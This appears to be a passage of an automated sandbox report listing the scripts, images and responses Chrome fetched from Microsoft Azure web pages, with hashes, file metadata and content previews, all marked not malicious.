                                                                        Category:dropped
                                                                        Size (bytes):72
                                                                        Entropy (8bit):4.241202481433726
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:9E576E34B18E986347909C29AE6A82C6
                                                                        SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                        SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                        SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (590)
                                                                        Category:downloaded
                                                                        Size (bytes):1716
                                                                        Entropy (8bit):5.2304068952006615
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:4CFFC2C9B55F8BDE649E0D2535A1EEBD
                                                                        SHA1:2AAF4DF1E02ED4F5BB48F00A7423F748BF544E0C
                                                                        SHA-256:7BB50A050792F761855CC330E0248D037B37DD68FD23FBB7DB8A7E8694F50A94
                                                                        SHA-512:599C87219B7E264CFF8E6951192C691E26DFFA88EFC607EDFE9205F1BB08DA28FD61B508FAE93652BE36BE1ADA57E50661490925B247A43C3EB7F24D8CA0C8D0
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://azure.microsoft.com/etc.clientlibs/microsoft/clientlibs/exp-analytics/v1.min.ACSHASH4cffc2c9b55f8bde649e0d2535a1eebd.js
                                                                        Preview:'use strict';var experimentationAnalytics=function(){function g(a){return a&&0<a.length?!1:!0}function m(a){return Object.keys(a).map(function(b){return b+""+a[b]}).join("")}function n(a){var b=a.reduce(function(c,e){c[m(e)]=e;return c},{});return Object.keys(b).map(function(c){return b[c]})}function h(a){console.log("sendToVortex Call");a&&a.analytics&&f(a)}function k(a){return{actionType:"A",behavior:"12",content:JSON.stringify({}),pageTags:{tnta:a&&a.analytics?a.analytics.tnta:""}}}function l(a,.b){return{actionType:"A",behavior:"12",content:JSON.stringify({}),pageTags:{tnta:"",at_activity_name:a&&a.responseTokens[b]?a.responseTokens[b]["activity.name"]:"",at_exp_name:a&&a.responseTokens[b]?a.responseTokens[b]["experience.name"]:"",at_activity_id:a&&a.responseTokens[b]?a.responseTokens[b]["activity.id"]:"",at_exp_id:a&&a.responseTokens[b]?a.responseTokens[b]["experience.id"]:""}}}function f(a,b,c){b="number"===typeof b?b:25;c="number"===typeof c?c:200;var e=0;if(window.expAnalytics&
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                        Category:dropped
                                                                        Size (bytes):231080
                                                                        Entropy (8bit):7.9909946986421705
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:1A1F6CD6A8EA8CF7BB6152C583BFFB16
                                                                        SHA1:FBD8EDB0B1CDF6A7C94F2E4F871D5D8CB4CC5712
                                                                        SHA-256:E70A2698DF203C3A2B8B200133A316E325B8455AE3B200CAA9F0B0CDDB2687BD
                                                                        SHA-512:35CD483DF073624A801816558D165EEF17BCB2D588D1049027D2CB322B4B6308D85BBA3EFD7190A68F6F4A39B8AC2EDC96E9BCAFFEA03AFA373CE09304FB0446
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:RIFF....WEBPVP8L..../....@l.F.....$...3{.%D...H.IR..H8..O...J.....\.?...9. ........W./Ix....<.........G.y.$..s.$.:.R.|....J%[r...{wo.'.!Ia..s..JRU..J.....T.T...7...[{w.*....V...n.mWUmu..=._...P.).....I."A..7.$O..m..Sw..M.k..[..SK..6C......%Y...w.t......Mvo.....2@.y.f..ifF...hVV..4#..|>.H..1 T.x..a&.$.eww..>.:...6[.-.`.........q..l....7.N.K...[....;.{f~...-$UH.W}T...^[.Y.DA..d.....DI.B;.D...(.'J,..!I.j.....T...%E.~..^m.K.*..I..[.....Z..Z..u.x.oI2...v$I:X.5...,..z......BPf..V@A.$G.e......._...... Z?14OCY.d.v.,I~....z..H.h!.0.E.h..+p.FIw....Elm..-.).... M"aI..2,...]"a$R..7fKy.MQ. $.(K"ah4...BX,.....6).!.#.....b.......h+c.}[D*2..e......Vl.gdD)..%E%...X4F"..2\.;.C..X)e(.a1|...J...ryu..\.c}...5mp.p..q..m..m....v....H.0..f?N=}....nwt.......'`....3...iMX.6.....".A..g..9..fh.1.\s..@.Cb..ah..P.JE..m.n.k...9."..n.X..Kh.n10.p5..R..x.....0....a.....n&&.......i.]..._w{}...%....Bq.>.Q0LX....4.......r...l.........A..0.o...V....&.6.6.........?..>....
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ISO Media, AVIF Image
                                                                        Category:downloaded
                                                                        Size (bytes):131910
                                                                        Entropy (8bit):7.996709086951647
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:18A8B61D46797D997D8C9122A6529F51
                                                                        SHA1:43A423135D576167511E378DD868888732CB3C46
                                                                        SHA-256:EF20EFE3E6CFF50EECD06ED4D7DEFBF27F1F7AD93685A195D103441BCFBA848E
                                                                        SHA-512:B2BF3C9390AF1CDC3FE8491FAE7D79749FA83618FE7FBAB935BAEF951A72A7F243742398CC013E59415651F8A63124E8D12144C1033F90817C866E8A9BADF31E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/371220-mobile-vertical-accordion-solutions-featured-tab-1-328x270?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=656&hei=540&qlt=100&fmt=png-alpha&fit=constrain"
                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D................,...(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma..................4mdat.....&h.o.....2...D....'"....Ks....8..m.,.%.i.....t.8.o.....p.b.._j..Bm..H..u...K.V.P...O1..Ad1jvX....Y.^..HJ..];1..Z...L.b..w...D...._..2vL.P.h..4...P.x..>.1.o.l..V....!....S..W.5.|+.}1....i.8n9.O.........P...gd..=uB...p.._...%...y..R.i+.b?...._..s.`....)...... .....C..|.TR.....j..6....3...r}.,..]..*.;o.._........W.[.......H...k..2...WI..D.:F.u.~..g+.bT.r*/..'.......:.(..)...L...6.....l.......(.*3.lf.}.f%..A...(n)..9.-[u%.i.......@'.Aq.V.j[.f.N..#L.w.!.qD....'.U.F.h.2.v..g.PD..g...#>..>.Y{Y.V...q..C}B.c.Gf......u...%.:.V..TG.zm..Z...(P.a.zF.v....".6._.....UWB4k..7$h....\.o..........=Y.b...h.-0.....nnJ\7E.,.Z....K..B..b..~_..$.+..i).~..T].>J._g:.....W.".WQ.0../5.........D.m..
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1312x984, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                        Category:dropped
                                                                        Size (bytes):229668
                                                                        Entropy (8bit):7.99907234873137
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:AF2CE1C15E4C381CFD2568D93BC3A89E
                                                                        SHA1:DFFFE327CECB034FAC8CAB3C1F25DEA51829EF4D
                                                                        SHA-256:B07016CF7B5E5E81CDCB5AE6754717F2A3FE0D2398151EEB54AF698832E7BF63
                                                                        SHA-512:7BD2A53C4A37C313B841A75AD3E13A07F33BF47DBF5AB2B702D4216C211238AB0D623B059E0C7BE137F11F13CE81038AFCECC363ABAF38ABE688D1E5D40734A4
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:RIFF....WEBPVP8 ........* ......%.v.g;|.....m.n.....s..../...;?..N.K..T....s.....?...L...UK{?.....SZ3.....1ON...c.....N.......~.....>.......r?.......3.C..g~K.k...+...'.o.?q............{...../...k.?.?.....?........'.G.....?..........S.C.....O...?..A...{...O.............._./.....o...?.{....'.W..........q...K...3....w...................?.........?.e.[........B..................._{....?.{........._K...o.O..y.......?...}.....{?..K......;...........~......k.?.?..]...s.o.7..........).w.W.........y.~...._.W......K................=...h.G.3......._.y.{G.?p.........A..............u.G............{...?.?......)...7.....?............#...w.7...z.'.6.."....}4.v.|...K..t\$ .@.._..Y/.*F.d.+;....0..Y/.]....G8....R...Xw...tH..,.8(`..u^.!K. ...b...u..i......#Y......i.........ZM........r_.k..7(....z.B.i..h.st..r[.*..<S.X<gw..AT.7..Y.6~In...5.....y35.....-..N.P...K}..woPtP..`.f\.6.7.BV....~e.j...N..3yH;...O.R....<..if..;..U.1.$F...7.8v..w.. ^Ep.....D.E...)M.].....VY.yc...
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                        Category:dropped
                                                                        Size (bytes):199286
                                                                        Entropy (8bit):7.955139803895235
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E6A62FB92629DA61CC2F57D1ED8680C9
                                                                        SHA1:07D5B662D7C7E0AF296B231A683ED93CE8456795
                                                                        SHA-256:CC223D0B3E0718516627C5F5ED4A954ED7E2B841637E2F631A11B577334C2A40
                                                                        SHA-512:2D58596E767A8989BE05B152D63808B03DE9DB8DF970CB0AC1E0EFE4015D405CF0894BDBA8E7703DDB3801A47145BA5A7E3E1F74C348D07C85E54C36322E2FDF
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:RIFFn...WEBPVP8La.../?....H.$I..>........%....P.EP.A@...Q..)....|.....(.q.F...GKy..Zv.R....gP.].3...,..d.zI..5F*..Y...-...7....&.k'...*.b&..i...h.2.lee.=Z".|&CB.f...a...j=....5Z.b.H..U......e.&.T[..N~.W..j...$.....y..P..R.....R...._m.6.9f.G`=...P..hC.]..5F.T....O..k...7...;..6..t.....1D......TyU.U@A..y..6..o.?.~..3_..W.........._...3\...s.@.E.....ls....).. ..m....."...6ZzJ.Y. ..!-Z.L..RQM.U.....t..& ......%.Z.j[.P....C7...,.o-...mT{OT.M.m.H.i...v.U.+q...e.I..6i.|2.....b.....6..y.....Vt.x.m..6....h.hKkZ...E......-`...S..m9.*.Nrk[.-4..L.'lJ.V..j{.........f.7...me.9....[.m;k....M......6e...N..1.\...n....F.......F%...u.C..n...&]Vq.;.@.J....v.}....n.i.^.Fg...{.;n..j...kg...m....m..d...z...'. {.....^. ..vw.zW;.v.<..m.m;.)..Tf.>s.>...b%<..=F=.P....\]....6p{..`....9` m.|.E^.f m.v.......7.m.m...7..>..c....G..].G.. .F.7...L/. .....?b..6.l.m[..]K-.|jkc.M9....&.._..".zN..~..L....1.|T.m.#.?..z.}.....%...........|.$h..2.w..,.....\ ........6..;/&.oc.m.v.....>.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (526)
                                                                        Category:downloaded
                                                                        Size (bytes):1683
                                                                        Entropy (8bit):4.981226266363334
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:551A5D1B5EBF715E3F78C311A57FA1D7
                                                                        SHA1:29EF719E00736BCFED725EC095ACA14578891F1B
                                                                        SHA-256:E1831970A3626C40DCAC24CAA7D40A342D02CF450942657456EDDF123D4A6289
                                                                        SHA-512:3ED0957342D84997D937CF36353D90CF05C9CA44EA16D13FC1D86FDA33585D1D614DB4CE27DC936575E8A4C247CC241D4CE7EDB6E37947020E4EE65761ACFE80
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://azure.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-market-layer.min.ACSHASH551a5d1b5ebf715e3f78c311a57fa1d7.js
                                                                        Preview:'use strict';(function(f,b){const e=["data-marketlayer-submarket","data-marketlayer-content","data-marketlayer-selector","data-marketlayer-position"];let h=b('[data-mount\x3d"market-selector"] select'),r=b('meta[name\x3d"marketLayerOverride"]:not([data-marketlayer-submarket])'),t=b('meta[name\x3d"marketLayerOverride"][data-marketlayer-submarket]'),g=[];const l=c=>{let a=[];t.each(function(){if(b(this).attr(e[0])==c){var d={content:b(this).attr(e[1]),selector:b(this).attr(e[2])+":not([meta])",position:b(this).attr(e[3])};.a.push(d);console.log(d)}});r.each(function(){let d=b(this).attr(e[1]),n=b(this).attr(e[2])+":not([meta])",p=b(this).attr(e[3]),q=!1;for(let k=0;k<a.length;k++)if(n==a[k].selector&&p==a[k].position){q=!0;break}q||a.push({content:d,selector:n,position:p})});console.log(a);return a},m=c=>{c.forEach(a=>{if("append"===a.position)b(a.selector).after(a.content),g.push({element:b(a.selector).next(),action:"remove",content:""});else if("prepend"===a.position)b(a.selector).befo
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (7794), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):7794
                                                                        Entropy (8bit):5.350716681959343
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:A5A510020CA1FD908E6ED09D25998FAB
                                                                        SHA1:214FCE1D3C10D68E3EC4701063E70F35FD582F98
                                                                        SHA-256:7FCBC5D3C3265E7038E929C1CFF2495764DD435C770852863EB46B9791C49524
                                                                        SHA-512:2E58053C2EE3192EB165B18F9ABFBD0C9D024707E0C2394FDFD8B49B543B55A0D2DC90A7FFAE43D3B7FDFB48AB604E05AB2F882F6937327F7D1BB2300D794BC3
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:window.lpTag=window.lpTag||{};lpTag.taglets=lpTag.taglets||{};lpTag.taglets.SurveyLogic=lpTag.taglets.SurveyLogic||function(e){if(!e.survey||"object"!=typeof e.survey||this===window)return!1;this.survey=e.survey.survey||e.survey;this.createQuestionsMap();this.defaultSelectValue=e.defaultSelectValue||"";this.header=this.survey.header||""};!function(e){var t="prototype";e[t].questionTypes={TEXTF:"Text Field",TEXT:"Text Area",SELECT:"Dropdown Box",RADIO:"Radio Button",RADIOH:"Radio Button (side by side)",CHECKBOX:"Checkbox",CSAT:"CSAT"};e[t].validationTypes={EMAIL:"email",NUMBER:"numeric",STRING:"alpha_numeric",CSAT:"csat",PHONE:"phoneNumber"};e[t].errorTypes={EMAIL:"email",NUMBER:"numeric",ILLEGAL_CHARS:"illegal_chars",REQUIRED:"required",CSAT_RANGE:"csat_range",LENGTH:"length",PHONE:"phoneNumber"};e[t].questionsText={MAX_LENGTH:2e3};e[t].csatRange={lowest:0,highest:5};e[t].getAllQuestions=function(){return this.survey&&this.survey.questions&&this.survey.questions.question&&this.survey.q
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                        Category:dropped
                                                                        Size (bytes):305396
                                                                        Entropy (8bit):7.602207415130299
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:B098FA69C666CE0FBAFFE5F045CA933E
                                                                        SHA1:8EE212FDC36282706174CD1733835CD41A8E9146
                                                                        SHA-256:755E899A38360B255C50FFAF69068ED01FEEADEED3A1C9307A764B67D1947894
                                                                        SHA-512:B1492E84B55044F9AA0CB903FD00798C4BEE09B5CA4FA6487DDAF2C80FD90C698DCB01B1D6BB17EBBAC5250A7B3F0692F731888C82B70CB22DC7B03D93AC9B3D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:RIFF...WEBPVP8L.../......m... W]y.5.?...........Z.co?...>..m4......%.6...d.$a..$..d.],.<......8..e..........#mb. |.h....+...m8.......x.66...l-I6+=\?cxV....1...&......<..`w...&.2.zy..!..'.{.2s....3$7<......2369...:mSG..M.....U..ES.[..n.G.nUIj.....PWu........p....7.#IV.......+..O........C.v.y.....m.V.... O..b1?.9.p.?...........n.H.a!"r...l.[.$W...B..pM..H.!.HJ)R@.....B.TM...G=.Q).....Rz$.x.A.2@)..b.{]Z.rVR....e.L.B..G........A..&&..`.(.%.....-....b......+X,.p.`...!....#r...Y..9.....p.y...rD......l6.....>.`#..D.#"....@6".l..F6.H.AV.Y..FD.....B.....`. .......@.Xd........w.......m#I......Y....{<...............^j.j.j....VmQUS....xq....x......0.h.q.&......`K..a.l...0...A.-).nAKI..`...np..`.;I.t.L7..?....Iw....U.l...sJ<4...HO.O.$.H.5I.$..H.$..B..:.G.K[. }._a]...+..-..}.mc.\....3;.....3.;.?......O.&..aw.....?HR{g......}.#I%....[.$K.$.B.....+yPQQ53.....m.9;.l.. ....c....$H......;.! (......$Y.$...EVw.........e..f.....#.....$.mK......}Uu.b.s....T.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (605)
                                                                        Category:downloaded
                                                                        Size (bytes):179808
                                                                        Entropy (8bit):5.556656445593751
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:C3AEC3D03BC5447975E3EE25B53F6C32
                                                                        SHA1:353F68C0F6DF93888427E40135CF2DBF517F6FD0
                                                                        SHA-256:72FBAC0EA8A0FF74E7ABE2E24FB992885AC904A3C1C579387E97654DD9C535BA
                                                                        SHA-512:7D0E3CE67B84B7C1BBFC4511623426D68DE11D90BBEFF026013424C17D810CB59C75CD0754DD3A8AD9D3E27ED9620C9A6B92E2D7188C03845B0C3CC0E72951A1
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://azure.microsoft.com/etc.clientlibs/microsoft/components/structure/page/clientlibs/custom-oneds.min.ACSHASHc3aec3d03bc5447975e3ee25b53f6c32.js
                                                                        Preview:'use strict';(()=>{function kc(a){a=!1===(a=void 0===a?!0:a)?null:gg;return a||((a=(a=(a="undefined"!==typeof globalThis?globalThis:a)||"undefined"===typeof self?a:self)||"undefined"===typeof window?a:window)||"undefined"===typeof Sc.g||(a=Sc.g),gg=a),a}function se(a){function b(){}var c;if(hg)a=hg(a);else if(null==a)a={};else{if("object"!==(c=typeof a)&&c!==yc)throw new TypeError("Object prototype may only be an Object:"+a);a=(b.prototype=a,new b)}return a}function Sa(a,b){function c(){this.constructor=.a}if(typeof b!==yc&&null!==b)throw new TypeError("Class extends value "+String(b)+" is not a constructor or null");ig(a,b);a.prototype=null===b?se(b):(c.prototype=b.prototype,new c)}function jg(a,b){for(var c=0,d=b.length,e=a.length;c<d;c++,e++)a[e]=b[c];return a}function Gb(a,b){return a&&ud.prototype.hasOwnProperty.call(a,b)}function vd(a){return a&&(a===ud.prototype||a===Array.prototype)}function te(a){return vd(a)||a===Function.prototype}function lc(a){if(a){if(Tc)return Tc(a);var
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):1976
                                                                        Entropy (8bit):4.4820518319503835
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:106A6A519DAD38A935C4D5AA2786D6FB
                                                                        SHA1:3340ADF8A3220D92786A423BEED46092103C5D7D
                                                                        SHA-256:C0F462098BFAC577C182C3A983C6A35A5016A5EE96655CF7B57A46F70EAB83EF
                                                                        SHA-512:8F0E42976D0D5D362CECD6CDDBE3F1DC84BAC7149DBAA78C8787409EE4224D04E5FE8D68631799ABF3E2DFA04D97B87F9F93A9B3399632E15C135B527558273A
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://azure.microsoft.com/etc.clientlibs/onecloud/components/content/reimagine/atomic/accordion/v2/accordion/clientlibs/site.min.ACSHASH106a6a519dad38a935c4d5aa2786d6fb.js
                                                                        Preview:.(function (document) {. document.addEventListener("DOMContentLoaded", () => {. const attrElement = $(".ocr-accordion .btn-collapse");.. /**. * Data attributes for accordion elements.. * @typedef {Object} DataAttributes. * @property {string} off - Data attribute value when the element is collapsed.. * @property {string} on - Data attribute value when the element is not collapsed.. */. const dataAttributes = {. "bi-bhvr": { off: "7", on: "8" },. "bi-ct": { off: "Accordion Expend", on: "Accordion Collapse" },. };.. /**. * Update data attributes based on the collapse state.. * @param {Object} currentObj - Current collapse instance.. */. const updateDataAttribute = (currentObj) => {. const isCollapsed =. currentObj?.triggerElement.classList.contains("collapsed");.. Object.entries(dataAttributes).forEach(([attribute, values]) => {. const dataAttrValue = isCollapsed
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1112334
                                                                        Entropy (8bit):5.629353115806243
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:5F9CB2240AEC370DCF4B38BC018B4A2C
                                                                        SHA1:FCA9EC94FB3095651CC5EB9138FC26691EF4BF31
                                                                        SHA-256:E461D7DB8B2E5F1134CF65A81CB67266012EFCA717F4A345FF82D565308B780C
                                                                        SHA-512:A81D5CFAACA8B3FF2D80FC47ADE9F4EB441D3154B5D965CCA71EA071B20C779F7DCA9DB3720E939223F091E9086851C936E34430AD71F347606CDA204737A364
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){"use strict";var e={937:function(e,t){function r(e){return btoa(e).replace(/\+/g,"-").replace(/\//g,"_").replace(/=+$/,"")}function n(e,t,n){e(null,{verifier:t,challenge:r(String.fromCharCode.apply(null,new Uint8Array(n)))})}t.A=function(e,t){e||(e=43);for(var i=window.msCrypto||window.crypto,o=r(Array.prototype.map.call(i.getRandomValues(new Uint8Array(e)),(function(e){return String.fromCharCode(e)})).join("")).substring(0,e),a=new Uint8Array(o.length),c=0;c<o.length;c++)a[c]=o.charCodeAt(c);var u=i.subtle.digest("SHA-256",a);window.CryptoOperation?(u.onerror=t,u.oncomplete=function(e){n(t,o,e.target.result)}):u.then((function(e){n(t,o,e)})).catch(t)}}},t={};function r(n){var i=t[n];if(void 0!==i)return i.exports;var o=t[n]={exports:{}};return e[n](o,o.exports,r),o.exports}!function(){var e=crypto,t=function(e){return e instanceof CryptoKey};function n(e,t,r,n,i,o,a){try{var c=e[o](a),u=c.value}catch(e){return void r(e)}c.done?t(u):Promise.resolve(u).then(n,i)}var i=functi
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1664x936, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                        Category:dropped
                                                                        Size (bytes):94296
                                                                        Entropy (8bit):7.997770760372627
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:A92F138BE4AE9EDDE19E4C4BA98B7595
                                                                        SHA1:3DB92D8B13C79755F722273D1FBEC1245AEBE423
                                                                        SHA-256:483FBBC38B8F9C5657154E80A2958F0AE891B71F7CDD9EFDAFCB795CFB138D49
                                                                        SHA-512:535AB5B4570C861106602826515400F76544487E730F0122AE8F14E32B4B48D5465864B0A7CF2B7CA56131366C095C08C726B45EF97D025E4EBFB023D5474783
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:RIFFPp..WEBPVP8 Dp...X...*....>E .D.....3.8...gC............w...^~...................^AO.\.h....3..}}.W..#gz>..O@>Y........G.~..s.O.?....k.k...'.O....h...........m.g./.....>........`.......G..bo._....O...a...........w...S..g.D?.........+..Qo$O.....2#.w....@.....?.}..s=j.~....G.^..;..#.. v.e.....e.6.....I..h.,..l.b..H.9.b.Y.L...:z.......Th)mM.......x...@....H....F.\.}|O].....A..!=m....4B.*..c...D<-khHFl..X&....P...<.i.tE\.S.1.....)...Ug.!y....42(j./.<.+}.0....K.=0.?%._V4"..|.,.Q.....|n....c).W........Hu4.=d&j..{..k.|W..6.c'......QD........ ,..c...x4.mA...... -TB.I..Z.d.f<.T{..3.e/=.w.t.....&h..5u...v...........l......Tu...i.X...f.C%.*0.....wuV.. rV mt.A.&Jx.X.@]...ml..k....`S..A.....w..I..y:..<.36~...}syy...m.....$.,9....l....W..x.A..P2.MC....O!.h.......G~..Q{...S<..to^..ek@.2.Q]r....X..5....e..t.[...g.j.....4BG{...,.....1M...O..(.g<...R.b\.c..].-.x.R..`2..o.G{c...F@%.c.Qy4.]..U..!...ina.B[...8.?..d.`a.Yl*X......>.jN.(..e...C..U!g...d.?.B........Z...
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ISO Media, AVIF Image
                                                                        Category:downloaded
                                                                        Size (bytes):508
                                                                        Entropy (8bit):5.907663974029435
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E7257EF3B516F431D87F634AD5AC3AFE
                                                                        SHA1:CE7DF73F8981875063BC229107F57C0ED87DC57E
                                                                        SHA-256:BAA456DBD7DA67FAA7CFF8B7255745E4D4F9C9479A401112A1F66F08FA2ABFE4
                                                                        SHA-512:D9008360A3453CF8E7DDFC0EC51A7D6166D4993A8E491E29C6EEB23B3416217F057D297ABEF8176EF3B7B1D72A7B91F9B8B6076F5D75EF8A721F56F4E256FF9E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/acom-icons-youtube-black-white-24x24?scl=1
                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma...................mdat....../...h4 2...... .......o.V..J..2..'5z].H(....8..D..j....6=Z..r..P.S."v+..8..3|].}.db....5o..W.p..2m.i/...M.u....]QX...G......U..m[..9.&2#..bt1..o..2u...=.D.....7Fu..U..9.....c...~V]/....p.....h.Z.O.X\...r1;q..a..p
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ISO Media, AVIF Image
                                                                        Category:downloaded
                                                                        Size (bytes):144847
                                                                        Entropy (8bit):7.998037052649741
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:FD70AF8D1FC83320ECA4EE46131541A7
                                                                        SHA1:E1AB8C05AF609FD1AD6668161576EAB14A71A3A9
                                                                        SHA-256:05CAF62BCF92671FCC1B84B4AD7671BD4D35998166C37208AAEDD6C51BAFFCC3
                                                                        SHA-512:C297B69E5F8AE263EAF798501D1F6E3659B26F003263B149ED86863C076F1AA7801EE38DD1391D54AEFD13A975F989B88D3666EB27F382BF5CEB3F40E81C624E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/371220-mobile-vertical-accordion-solutions-featured-tab-3-328x270?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=656&hei=540&qlt=100&fmt=png-alpha&fit=constrain"
                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D...............4....(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma.................4.mdat.....&h.o.....2...D....'"....Ks....8..m.,.%.i.....t.8.o.....p.b.._j..Bm..H..u...K.V.P...O1..Ad1jvX....Y.^..HJ..];1..Z...L.b..w...D...._..2vL.P.h..4...P.x..>.1.o.l..V....!....S..W.5.|+.}1....i.8n9.O.........P...gd..=uB...p.._...%...y..R.i+.b?...._..s.`....)...... .....C..|.TR.....j..6....3...r}.,..]..*.;o.._........W.[.......H...k..2...WI..D.:F.u.~..g+.bT.r*/..'.......:.(..)...L...6.....l.......(.*3.lf.}.f%..A...(n)..9.-[u%.i.......@'.Aq.V.j[.f.N..#L.w.!.qD....'.U.F.h.2.v..g.PD..g...#>..>.Y{Y.V...q..C}B.c.Gf......u...%.:.V..TG.zm..Z...(P.a.zF.v....".6._.....UWB4k..7$h....\.o..........=Y.b...h.-0.....nnJ\7E.,.Z....K..B..b..~_..$.+..i).~..T].>J._g:.....W.".WQ.0../5.........D.m..
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):175
                                                                        Entropy (8bit):4.68043398329258
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:96F0C5B1219E39B8788028F5C17A5AD9
                                                                        SHA1:D6DCE0DE065B0D13905EAEDA0BA5C0DEA3D8F67C
                                                                        SHA-256:1FC2BCE2D46DF4565B8C488B22225CFE7ADB7C37CC9A542D4F85B61995B306CB
                                                                        SHA-512:057810FA0558506C6B8ABECB1A7A58FF61DA0609B3A5798BB42DE3A9B801CA0D8B20C4C1F9A250EE33D30492452CC5C4553332B16300408AA0C45B1515D4AF10
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://azure.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-cookieconsent.min.ACSHASH96f0c5b1219e39b8788028f5c17a5ad9.js
                                                                        Preview:'use strict';function AEMOnCookieConsentChangedCallback(a){}if("undefined"!=typeof WcpConsent&&null!=WcpConsent)WcpConsent.onConsentChanged(AEMOnCookieConsentChangedCallback);
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (65471)
                                                                        Category:downloaded
                                                                        Size (bytes):4004963
                                                                        Entropy (8bit):5.608526137357891
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:B43015D52D9B94E96ED0014BEEC60073
                                                                        SHA1:4FF02D873DE449E83D0BD2E8CA0AEE0CCCEC2A5C
                                                                        SHA-256:74F25E06CA7E129830D80CE20633807EE402C2163B758A9642A1845C59CADB14
                                                                        SHA-512:CEEDE0683CCAEC41D0C203EAE939331F82C0265ACBCFB218476183423EA207BA3C06A1E49FE7D91D6CB1F860801D899255A3BAC3DF340A5B1F3A35B09B97D322
                                                                        Malicious:false
                                                                        Reputation:unknown
